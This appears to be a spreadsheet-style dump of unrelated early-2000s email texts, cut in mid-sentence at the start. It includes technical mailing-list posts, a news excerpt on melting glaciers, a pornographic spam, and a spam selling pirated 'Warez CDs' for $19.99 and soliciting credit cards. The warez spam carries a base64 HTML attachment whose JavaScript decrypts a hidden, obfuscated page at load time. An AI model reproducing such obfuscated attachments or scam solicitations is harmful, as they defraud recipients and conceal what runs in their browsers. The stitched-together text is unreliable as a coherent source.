 are developing sophisticated computer models that combine data on where
 glaciers are melting fastest and where humans and animals are known to
 have migrated to pinpoint the best places to search in Alaska's Wrangell
 and St. Elias mountain rangesthe United States' most glaciated
 terrainand in the Andes. Johan Reinhard thinks the fast- thawing
 European Alps could also deliver more findings, perhaps as exquisite as
 the Ice Man. "Global warming is providing us high-altitude
 archaeologists with some fantastic opportunities right now. We're
 probably about the only ones happy about it."
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, Adam L. Beberg wrote:
 &gt; On Sat, 27 Jul 2002, CDale wrote:
 &gt; 
 &gt; &gt; A true geek.  Runs to the puter to post before taking a laboring wife to
 &gt; &gt; the hospital.  I'd kill you.  LOL
 &gt; &gt; Grats, Daddy-o!
 &gt; 
 &gt; Fear not poor Tom, between the pain &amp; endorphins and/or massive amounts of
 &gt; drugs, she should remember little of the process. Her body is designed to
 &gt; block out the whole event, so that she can tell other women "oh having the
 &gt; baby wasnt so bad, you should have one!". Why else would any woman be
 &gt; willing to EVER have sex.
 This tells me two things: 
 1. You are truly male.
 2. You are a male who has a very narrow view of what sex is about.
 (:
 C
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Custom Warez CDs
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart MIME message.
 --= Multipart Boundary 0911021155
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;TABLE cellSpacing=0 cellPadding=0 width=725 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=470 rowSpan=2&gt;
 &lt;TABLE height=111 cellSpacing=0 cellPadding=0 width=723 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=723 colSpan=4 
 height=111&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Introduction&lt;/FONT&gt;&lt;/B&gt; &lt;BR&gt;We sell Backup 
 CDs, also known as Warez CDs. Backup CDs are copies of Software. 
 &lt;P&gt;For example if you go into a shop and buy Windows XP Pro, for about $299 you 
 get the Serial, the CD, the Box and the Manual.&lt;BR&gt;&lt;BR&gt;If you order it off us, 
 you get:&lt;BR&gt;The Windows XP CD and the Serial Number. It works exactly the same, 
 but you don't get the manual and box and the price is only $19.99.&lt;BR&gt;That is a 
 saving of $280, and the only difference is you don't have a colorful box and 
 manual - which are not very 
 useful.&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Features&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;&lt;FONT face=Tahoma size=2&gt;- over 
 400 applications&lt;BR&gt;- over 1500 games&lt;BR&gt;- we reply at all your requests in a 
 few hours&lt;BR&gt;- newest releases &lt;BR&gt;- we have the best price on the WEB&lt;BR&gt;- best 
 choice of CD's ever seen on WEB&lt;BR&gt;- we ship orders to worldwide&lt;BR&gt;- secure 
 credit card processing thru our authorized on-line retailer. Your information 
 will be passed through a secure server and encrypted (128bit).&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=Tahoma size=2&gt;&amp;nbsp;No need to worry about someone will steal you 
 credit card details.&lt;/FONT&gt;&lt;/P&gt;
 &lt;TABLE height=200 cellSpacing=0 cellPadding=0 width=723 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=159 height=200&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 
 height=16&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Most popular CD's........&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" width=61 height=12&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" width=143&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top height=56&gt;&lt;IMG 
 height=56 src="http://images.amazon.com/images/P/B000063EMG.01.TZZZZZZZ.jpg" 
 width=50 border=0 NOSEND="1"&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top&gt;&lt;BR&gt;Adobe PHOTOSHOP 
 7.0 finall&lt;BR&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;only: $19.99&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 height=14&gt;
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top height=54&gt;&lt;IMG 
 height=51 src="http://www.relib.com/news/pic/windows_xp_white.gif" width=50 
 border=0 NOSEND="1"&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top&gt;&lt;BR&gt;MS Windows XP 
 PRO.&lt;BR&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;only: $19.99&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 height=14&gt;
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top height=53&gt;&lt;IMG 
 height=52 src="http://images.amazon.com/images/P/B00005AFI1.01.TZZZZZZZ.jpg" 
 width=50 border=0 NOSEND="1"&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top&gt;&lt;BR&gt;MS Office XP pro 
 (3CD's)&lt;BR&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;only: $19.99&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top colSpan=2 
 height=14&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" width=14 height=200&gt;&amp;nbsp;&lt;/TD&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=559 height=200&gt;
 &lt;TABLE height=226 cellSpacing=0 cellPadding=0 width=485 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=464 
 height=18&gt;&lt;FONT color=#ff6600&gt;&lt;B&gt;Gratitude's of our 
 customers...&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=500 
 height=61&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;John Stewart&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;Thanks guys, I just 
 got the set of CD's and they work as promised. You got a happy customer ready to 
 order some more and I'll send more customers. 
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=500 
 height=77&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Mike Sandell&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;I only want you to 
 now that the CD I ordered had arrived. I was a little suspicious when I ordered 
 the stuff, but I was wrong. Thanks for your services and never let the site go 
 down. 
 &lt;HR&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: 8pt; FONT-FAMILY: Tahoma" vAlign=top width=500 
 height=70&gt;&lt;B&gt;&lt;FONT color=#ff6600&gt;Chris Anderson&lt;/FONT&gt;&lt;/B&gt;&lt;BR&gt;Top marks for an 
 excellent service. Your speed of response to my query was second to none. I'll 
 certainly be buying from you in future. Keep up the good work, guys. 
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P align=center&gt;&lt;font size="5"&gt;&lt;B&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;To 
   Order Please Open &lt;font color="#FF6600"&gt;warezcds.html&lt;/font&gt;&lt;FONT 
 color=#ff0000&gt; &lt;/FONT&gt;in Attachment&lt;/font&gt;&lt;/B&gt;&lt;/font&gt;&lt;/P&gt;
 --= Multipart Boundary 0911021155
 Content-Type: application/octet-stream;
 	name="warezcds.html"
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment;
 	filename="warezcds.html"
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgSFRUUC1FUVVJVj0iRXhwaXJlcyIg
 Q09OVEVOVD0iSFRNTGNyeXB0Ij4NCg0KPCEtLQ0KIC0tLS0tLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnwgICAgICAgDQogLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KLS0+DQo8c2NyaXB0IGxh
 bmd1YWdlPSJKYXZhc2NyaXB0Ij4NCjwhLS0NCg0KZnVuY3Rpb24gcHJvY2Vz
 cyhhcikNCiB7DQogIHZhciBTdHJpPScnDQoNCiAgdmFyIHksIHosIHN1bSwg
 biwgbjEsIG51bWJlciwgaj0wDQogIHZhciBrZXkgPSBuZXcgQXJyYXkoMTI1
 OTMsMTI4NTAsMTMxMDUsNTApDQoNCiAgbjE9OA0KICBmb3IgKGo9MDsgajxh
 ci5sZW5ndGg7ICsraikNCiAgIHsNCiAgICBmb3IgKGk9MDsgaTxhcltqXS5s
 ZW5ndGgtMTsgKytpKQ0KICAgICB7DQogICAgICBzdW09NDA1NTYxNjk2OA0K
 ICAgICAgbj1uMQ0KICAgICAgeT1hcltqXVtpXQ0KICAgICAgej1hcltqXVsr
 K2ldDQogICAgICB3aGlsZShuLS0+MCkNCiAgICAgICB7DQogICAgICAgIHot
 PSh5PDw0KStrZXlbMl1eeStzdW1eKHk+PjUpK2tleVszXQ0KICAgICAgICB5
 LT0oejw8NCkra2V5WzBdXnorc3VtXih6Pj41KStrZXlbMV0NCiAgICAgICAg
 c3VtLT0weDlFMzc3OUI5DQogICAgICAgfQ0KDQogICAgICBTdHJpKz1TdHJp
 bmcuZnJvbUNoYXJDb2RlKHkmMHhGRikrU3RyaW5nLmZyb21DaGFyQ29kZSgo
 eT4+OCkmMHhGRikrU3RyaW5nLmZyb21DaGFyQ29kZSgoeT4+MTYpJjB4RkYp
 K1N0cmluZy5mcm9tQ2hhckNvZGUoKHk+PjI0KSYweEZGKQ0KICAgICAgU3Ry
 aSs9U3RyaW5nLmZyb21DaGFyQ29kZSh6JjB4RkYpK1N0cmluZy5mcm9tQ2hh
 ckNvZGUoKHo+PjgpJjB4RkYpK1N0cmluZy5mcm9tQ2hhckNvZGUoKHo+PjE2
 KSYweEZGKStTdHJpbmcuZnJvbUNoYXJDb2RlKCh6Pj4yNCkmMHhGRikNCiAg
 ICAgfQ0KICAgIGRvY3VtZW50LndyaXRlKFN0cmkpDQogICAgU3RyaT0nJw0K
 ICAgfQ0KICB9DQoNCmZ1bmN0aW9uIHN0YXJ0KCkgew0KdmFyIGFyPW5ldyBB
 cnJheSgpDQphclswXT1uZXcgQXJyYXkoOTIyNzIxNTczLC0xMDE1NDI4MzI4
 LDU2Nzg2NDU2OCwtMTgzNjAwNTcwNywtNzEyMDQ5MjkyLC03NDExMDI5NzYs
 MTExNjI4NTAyNCwtMzYzNTc1MTcsMjA5OTc3Mjc5OSw4MjI2NDI1MjEsLTQ5
 NzQ2NDc3NSw0MzA4MDg4MDksMTA2NDUxMTYyMiwxNzEyNjc0NTEwLC0xMDUx
 MjQwNjI2LC02MjkwNjg0MDUsMTIyNzQ1MTgxMCwxOTA0ODY2NDUsLTMyNTgz
 MDMwNiw2MTg5OTE1NTEsLTE3Nzk2NDYzNDgsMTY4NjA0MzY4LDE1MTU5MTY4
 NTEsLTIyMjUwNzkxOCwtNjE2MjYyMDE0LDE4NzUyNTA3ODgsLTE5MzM4NDE1
 MTYsMTk2NjIwNDcwNCw1ODQzOTYxODAsMTgwOTY4NDU4NCwtMzU1MDk2NDE0
 LDc2NjA2NTMwOCw5NDI4ODIwODgsMTc3NzE4NjQ3OSwtMTU2NzI2ODI0MCwx
 MzEwNDY2Mjg2LDcxMTAzNzUzMCwtMjMwODA0OTI0LDEzNzM3ODUzNzksMTEz
 MTU4NDQ4MywtNjE0NzMxNjYxLDExNDIzNzMxODgsMTQyNzE5ODQxNCwtNjc3
 MDcxOTYsMjYyNTM0MTQ4LDE1MjM0MTU1NjAsMTIwOTg3ODc5NCwtMzMyODQy
 MTAxLDUzMTI0MDIzMywtMTg1MjgyODgwLC05NDQ1ODQxLC0xMjUzOTM3MzY0
 LDkzNDMxNzk3LC0xNzY2OTAwNDI5LC0yODMyNTEyMDAsLTIwMzExMTQ5NjQs
 LTc5ODIwNTMxMywxODk4MDE4OTg0LC0xNjU2MjY3OTc0LC0xMDgwNTYxMzM4
 LDEwNzI4NjYxODAsMjAyMTk3NzExNiw3Mzc5NjU2MDcsLTE5OTU3ODA3ODgs
 LTIwMzM0NzkyNjgsNDgxODkzNzgwLDE2NzY1MTU1NTAsLTEyNTAzMzk5Miwx
 NzEzNTc2MDUzLC01MzQyOTI0OTQsMTAzNzc1NjU5LC0xMjcwOTY1OTM4LDU4
 MDA3MjQ4LC0xMzQ3NzE5NzEsMTg2MzkzODI1MSwtNzcxNjM4OTMyLC0zODEw
 ODk4ODgsLTg4NDE1ODI5Niw5NjAwOTI3OTksLTcwODI1MDczNCwxMTQyMTkw
 Mzg4LC05MjkxMjE4OTQsMTk1MjI3OTcyMyw4MTU0NzYzMjQsLTE4NjMwOTYz
 NTgsLTYzOTQ3Nzg5MSwtNDEyNDY5Mjg5LDEyODUwMjA5OSwyMDE0ODUxMDcs
 LTE1NTQ5MTk4ODEsMjExNzYzNjcyLC0xNTAxOTUxNDMxLDE1MzYyNDQzNDMs
 LTE5Nzg2NzUyMTMsLTE2MTI3MTE4MTAsLTQ0OTkyMTI1OSwtNzkxMTgzOTAx
 LC03NzU1ODExMzYsMTU1OTc4NzIwOCwtNzAwMzkwMTEwLC0xMDI2NjAxMzg1
 LC01NTE5NTk4MzAsLTIwOTcwMzM5MCwtMTM4NDA4NjMsLTIwMjY4MDkxNDMs
 MTk1OTQzNzIwOCwxNzgxNzgxNzMwLC0xMjA1ODE5MTk4LC0xMTEwMTQ5ODY1
 LC0yNTc5MjU4ODQsLTEwOTAxMTI3MTMsLTE4MTQ4OTMxMjksMzA0OTEwMTg0
 LC02OTQ4NDcwNzgsLTE3Mzk0NDg4ODAsLTQzODI4MDQxMSw3NzMxNjQ5NzEs
 LTEwOTI5NDc2NjcsLTEyOTMyNjE2MiwtMTIwNzIzNjgxMywtNDY2MDgxNDk3
 LDY0NzM2OTAyOSwtMTA3MzYwNjA4Miw3MTQwOTMyMDYsLTE2MDc0MDQ2NCwt
 MjA2NTczNTQ5LC0xODQyNjAwNjUwLDE3MTQ4ODEwMzEsMTU5MDkwMTYwNSw5
 NjA4OTU5NDIsMTk4MzkxOTc1MSw2MDk2NjI3NzIsMTEyMDU2Mjc0MiwtMTMw
 MDY2MDE2MCw4NTEyNTQ5NDMsMTE4MTQzMzA4NCwtMTk3NzQzMzYwNyw2ODM5
 NjA4MTYsLTIwNjk2OTk0NDUsLTE0MzQzNjM0MjYsLTEwNzQ2NTQ1MTAsLTE0
 MjU2NzI1NDAsMTAwOTk5NjU0MiwtMTY0MTkyNDM3MywzNTgxMjU1OTgsNTQy
 Mjc4NzQ5LDUwMTU4MTM0MCw0NzYxMzExMjEsLTE0NjUxNTkwNjQsLTQ5MjAx
 NTU1NCwtMTc5Nzc2ODYxNSwtODYzMzI2MTY4LC0xMTE0NDkxNjc5LC05NDc4
 MTU5OCwtMzA5MTI0ODkxLC0xNTY2MDI2ODY3LC0yMDIyMzc2OTQ0LDczNDU1
 NDcyNCwxNTgwMDA0NDY0LC05NzAwNDEzNCwtNzUwNDE3MzYsLTk5MzcxMTM5
 MCwtMTM0NDYxOTMxLDE2MjUyNDY4NzcsLTEyODkzNzYwMzMsLTg2MTIyNjk1
 NiwtMTY4MTM5NzYyLDk1ODU3ODc2OSwyODAwMzc5MzcsNTY2ODM4OTk5LDMw
 NjQ2MzA4OCw1NjcyOTg5OTUsLTcxMzUxNDYzMywtMTA0MjU5MjQ5NiwtNDI5
 MDA0NzMxLC0xNzU1NDc5MzA0LC05MTkxOTQ5OTMsLTc0MTQ0OTkyNSwtMTAz
 MzU0MzY3NywtMjEwNjA1MzgzMyw5NDEyNjQ2MjEsMTYwODIxNjQ1NiwtODMy
 Mzg3ODE2LC0xODE2NTY3MDI4LC0xOTMxMjY0Nzk1LC0xODIwOTc3OTkyLC0x
 NDAwOTgzNjk4LC0xMTc1OTMyNjc2LDMyNjg2NzQwOSwtMTA3NDU3MDAwLC0x
 ODc3NjIwMDcsMTg1MDQ1MzEwNywxNzEzNzkyMDY0LDY2Mjk2NjQyLC03MTIx
 ODQzODMsLTEzMDQxNjcxNjksMzA5MDA5Njg3LC0xNTQzODU0MTcsLTE4Mjc5
 OTA2NzMsMTk5MTgyOTIyNywtMTg2MjAxMDY5NSwxNTcwMTA0MTAwLC03ODQw
 NDM0NCwtMTE1NzA1NjgwNiwtMjAzNDEyOTIyMSwxMjA3NjUzMzI3LC0xNDE4
 NDI5MTE4LDEzNDU3ODQ3MjksMzEzMzU5NDYsLTkwODEwMzAwOSwtMjM0MDA1
 NjY5LDgzNzQwNDYwNiwxODA4MzM5MTEsLTIxNDI1MjMzMywxNDUyMDUwNjY1
 LC0xOTM3OTcyODQ1LC04MDM5OTM3ODEsLTE2ODUwNTkxMzgsMTgxMTU2Mjc5
 MiwxNDUxMzA5MjIsMTg2MzQwNDg3LC04Nzg2NzI0OTEsODYxNDk3NjA1LDIx
 ODE3MTc0OSwtMjE0Nzg5Mzg1LDUyNjM3NjA4NywxMzMyNzQwNjg5LDE5Njk1
 NTQ0NzksLTE3NDI0MDgzMTIsMTY3MTg1OTg2NywtMjA5MzYwMjA3OSwxMTUz
 MTYyNjIxLDk0MDcxNDYxMSwzOTI0MTYyMTEsLTE1MjAzODQxODksNTc5NTE3
 OTEyLC0xNTExMjY0OTk2LC03MDYwMTA0NjQsMTE4MTY4NzA0Myw1NTIyMTcw
 MDUsLTI0ODA4NjAxNCw5MzgwNjk5NzEsLTE3NDI0MDgzMTIsMTY3MTg1OTg2
 NywxODc0MzI5OTMsLTIxMTQwNjgxMCwxOTk2Mjc3MTg3LC0yMDY3NDM5MjQx
 LDEzNzk5MDAxMzgsLTE2Mzc2MzY2ODYsLTc1MDM2MzI4NCwyMDkwOTM1MjU0
 LDk5NzY1MDM0NywxMzIzNzI5OTQ4LC0yMDA4MzUxNDE2LDMxNzAwMDczOCw1
 OTI5MzYzNjksLTE2NjQ4MDYzODEsMjQwOTQzOTAzLC0yNTUzODU5ODksLTE1
 OTUyNjc4ODcsLTQxODYxNjAxMSwtMTMzNDkzMzA0MSwxMjY4MDE5MzEsMTA1
 MzUyOTYwMiwxMjAzOTY2NDcyLDI4MjgxMTYyMCwxNjg1MTQ4NzUzLDE2NTI2
 MTQ2MTMsMTM1MzczMzc1MykNCg0KcHJvY2VzcyhhcikNCn0NCnN0YXJ0KCkN
 Ci8vLS0+DQo8L3NjcmlwdD4NCg0KPC9ib2R5Pg0KPC9odG1sPg0K
 --= Multipart Boundary 0911021155--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: sprint delivers the next big thing??
</t>
  </si>
  <si>
    <t xml:space="preserve">right Mike,
 i will agree to disagree but i take your comments to heart.  my opinion is
 only that this is one of the last frontiers of communications ('instant
 show') that we cross easily (though you are right as rain on pricing).  i am
 mildly amused at the level of skepticism and innatention it is getting.
 my premise is that the world will change in dramatic and unexpected ways
 once there are a billion 'eye's' which can instantly share what they see
 amongst each other.  that doesn't mean that people will stop talking on
 their phones, or that people will spend more time w/images than voice.  just
 that it is fundamental.  from news to crime to privacy to dating to family
 life to bloopers and practical jokes, i believe there will be an explosion
 of images unleashed specifically by cell phone integrated lenses because of
 their utter ubiquity that dwarfs all pictures taken in the history of
 photography by orders of magnitude and in short order. and yes, changes
 things 'big time'.
 rgds,
 rob
 -----Original Message-----
 From: Mike Masnick [mailto:mike@techdirt.com]
 Sent: Tuesday, August 20, 2002 11:58 PM
 To: Rob Shavell
 Cc: fork@example.com
 Subject: RE: sprint delivers the next big thing??
 Not to keep harping on this, but...
 At 11:36 PM 8/20/02 -0700, Rob Shavell wrote:
 &gt;content: who cares about content?  that no one can think of 'useful'
 content
 &gt;is always the business persons mistake. the content is the users
 &gt;communications.  its anything and everything.  avg person could easily send
 &gt;half dozen pics to a dozen people a day.  mainly humorous i'd guess. who
 &gt;cares if content is trivial in nature. picture speaks a thousand words.
 This does nothing to answer my question.  I *do* care about content.  Hell,
 if I could be convinced that people would send stupid pics back and forth
 all day, I'd have a different opinion of this.  I just am not convinced
 that they will (stupid or not).
 While a picture may be worth a thousand words (and this is the same
 argument the guy who works for me made), how many people do you know who
 communicate by pictures?  Sure, it sounds nice to say that a picture is
 such an efficient messaging mechanism, but how often do you actually find
 yourself drawing someone a picture to explain something?
 I don't buy it.
 For most messages, text works fine and is the most efficient
 mechanism.  For some messages, pictures do the job, but I would say not
 nearly as often as words.  Why do you think Pictionary and Charades and
 such are games?  Because images are usually not the most efficient way to
 get a message across.
 &gt;misc ramblings: i suppose you skeptical forkers would have said the same
 &gt;thing about '1 hour photo' processing.  trivial, who needs it, i get better
 &gt;resultion elswhere.  and yet, it had great decentralizing impact - the
 plant
 &gt;had to be downsized and pushed to the retail operation - the digital
 camera,
 &gt;and finally the integrated digital camera phone brings this cycle of
 &gt;decentralization in photography to a logical conclusion (which will put the
 &gt;photo giants to bed) and change the world in a meaningful way.  also, SMS
 &gt;didn't take off because its easy, it took off because it costs less.  its
 &gt;greatly ironic the carriers often trumpet the 'profitabilty' of their SMS
 &gt;traffic over others because of its ratio of cost to bandwidth.  in reality,
 &gt;SMS cannibilizes the voice rev's they bought their networks to handle.
 Again, this is the same argument my colleague made (along with "you just
 don't understand kids today, and they'll run with this").  I wasn't saying
 that MMS wouldn't take off because it wasn't high quality or that it wasn't
 easy.  I was saying that I couldn't see why people would use it in a way
 that "changed the face of communications".
 I'm looking for the compelling reason (even if it's a stupid one) why
 people would want to do this.  Sure, if they integrate cameras into the
 phone, and the quality improves (even only marginally) I can certainly see
 people taking pictures with their cameras and occasionally sending them to
 other people.  But, mostly, I don't see what the benefit is to this over
 sending them to someone's email address, or putting together an online (or
 offline) photoalbum.
 I don't think 1 hour photos are trivial.  People want to see their own pics
 right away, and the quality is plenty good enough for snapshots.  That's
 one of the main reasons why digital cameras are catching on.  The instant
 view part.  I'm guessing your argument is that people not only want
 "instant view", but also "instant show".  Which is what this service
 offers.  I'm not convinced that most people want "instant show".  I think
 people like to package their pictures and show them.  That's why people put
 together fancy albums, and sit there and force you to go through them while
 they explain every picture.  Sure, occasionally "instant show" is nice, but
 it's just "nice" on occasion.  I still can't see how it becomes a integral
 messaging method.
 What's the specific benefit of taking a picture and immediately sending it
 from one phone to another?  There has to be *some* benefit, even if it's
 silly if people are going to flock to it.
 I'm searching... no one has given me a straight answer yet.
 The *only* really intriguing idea I've heard about things like MMS lately
 are Dan Gillmor's assertion that one day in the near future some news event
 will happen, and a bunch of people will snap pictures with their mobile
 phones, from all different angles, and those photos tell the real story of
 what happened - before the press even gets there.
 Willing to be proven wrong,
 Mike
 PS If the wireless carriers continue to price these services as stupidly as
 they currently are, then MMS is *never* going to catch on.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Internet Archive bookmobile
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.sfgate.com/cgi-bin/article.cgi?file=/gate/archive/2002/09/26/bono
 act.DTL
 Opening arguments are set to begin early next month in Eldred vs. Ashcroft,
 a landmark U.S. Supreme Court case that will decide the future of copyright
 law, including how and when artists and writers can build upon the work of
 others.
 ....
 To heighten public awareness of the importance of the case an Internet
 bookmobile is set to depart San Francisco next Monday on a trip that will
 bring it to the steps of the Supreme Court building in Washington, D.C.,
 before arguments wrap up. The van, which will be stopping at schools,
 libraries and senior centers along the way, is equipped to provide free
 high-speed access to thousands of literary and artistic works that are
 already in the public domain.
 --------
 I had the opportunity to visit the Internet Archive about a month ago, and
 saw the bookmobile under construction. It's a neat idea. Take an SUV, put a
 small satellite dish on the top, and put a computer, printer, and binding
 machine in the back. Voila -- people can search for a book, then print out a
 copy right there on the spot. Quite literally on-demand printing. Total
 fixed cost of the computer/printer/binding machine, if bought new (the IA
 had the equipment donated) is under $10k.
 One of the goals is to show libraries across the country that they could, if
 they wished, add these "virtual holdings" (public domain materials) to their
 existing library, at a fixed cost most libraries can afford. This should be
 compelling to small libraries in remote areas.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">James&gt; This is not an exmh problem, but an interaction between sendmail,
 James&gt; Solaris and mh.
 Correct.
 James&gt; Your sysadmin is wrong.  It is the responsibility of the receiving mail
 James&gt; server to escape lines beginning with "From " if they choose to turn
 James&gt; on that facility.  It is not the responsibility for email clients to
 James&gt; cater to the stupid design of the unix mail spool, and Sun's even more
 James&gt; stupid decision to rely on "Content-length:" instead of dealing with
 James&gt; this problem.  Since mh is unaware of "Content-length:", rcvstore gags
 James&gt; trying to parse messages from the spool.
 Also correct.  In fairness, though I cannot defend the Content-Length: header
 as I consider it brain damage in the extreme, Sun inherited this from AT&amp;T.
 James&gt; Get your mail administrator to add the "E" flag to your sendmail.
 James&gt; This means you will never see a line beginning with "From ". Any such
 James&gt; line will look like "&gt;From ".
 Specifically, you will need to find a line in /etc/mail/sendmail.cf that
 starts with "Mlocal" such as:
 [4784] grep ^Mlocal /etc/mail/sendmail.cf
 Mlocal,         P=/usr/lib/mail.local, F=lsDFMAw5:/|@qPSXfmnz9E, S=EnvFromSMTP/HdrFromL, R=EnvToL/HdrToL,
 [4785] 
 and make sure that 'E' appears in the long list of flags following "F=".
 If your sys-admin uses m4 to generate sendmail.cf, and any good sys-admin
 should, then here is the magic line for the .mc file:
 MODIFY_MAILER_FLAGS(`LOCAL', `+E')dnl
 James&gt; You can learn to use procmail, invoking rcvstore directly instead of 
 James&gt; letting sendmail put your incoming mail into the spool.  This avoids
 James&gt; the whole issue.  rcvstore only deals with a single message at a time,
 James&gt; and everything works.
 Also correct, though procmail per se is not needed, as other filters (such
 as slocal, which is part of the [n]mh distribution) do the trick just as well.
 -- John
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: want me on top? 189643322211
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;BODY BGCOLOR="#FFFFFF" &gt;
 &lt;P ALIGN=CENTER&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;a href="http://www.freewebland.com/pjordan/"&gt;Put these nasty sluts to the test! &lt;b&gt;FREE&lt;/b&gt; Access!!&lt;br&gt;
     &lt;br&gt;
     &lt;br&gt;HEAVY HARD and FREE!
 &lt;br&gt;
 &lt;a href="http://www.freewebland.com/pjordan"&gt;Nothing to loose!!  Click here, no membership required! It's &lt;b&gt;FREE&lt;/b&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
   &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;&lt;b&gt;&lt;font color="#FF0000"&gt;NOTE:&lt;/font&gt;&lt;/b&gt; 
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 84221111000
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Roi wrote :
 &gt; oh xmms didn't work for me also
 &gt; i used mpg123 i tought its something from me
 Nope, this is "normal" as Red Hat removed all mp3 support from 8.0 because
 of patent and royalty issues :-(
 On freshrpms.net, you can find the xmms mp3 plugin as I said, but also
 libmad, lame (mp3 encoder), and soon mpg321 as I often used it myself.
 Many other players can also play mp3 files, like alsaplayer, xine, mplayer.
 &gt; like mplayer not working also and gives black screen
 This is not normal though...
 Try "mplayer -vo help" then try usinf various output methods to see if some
 do work or not.
 Matthias
 -- 
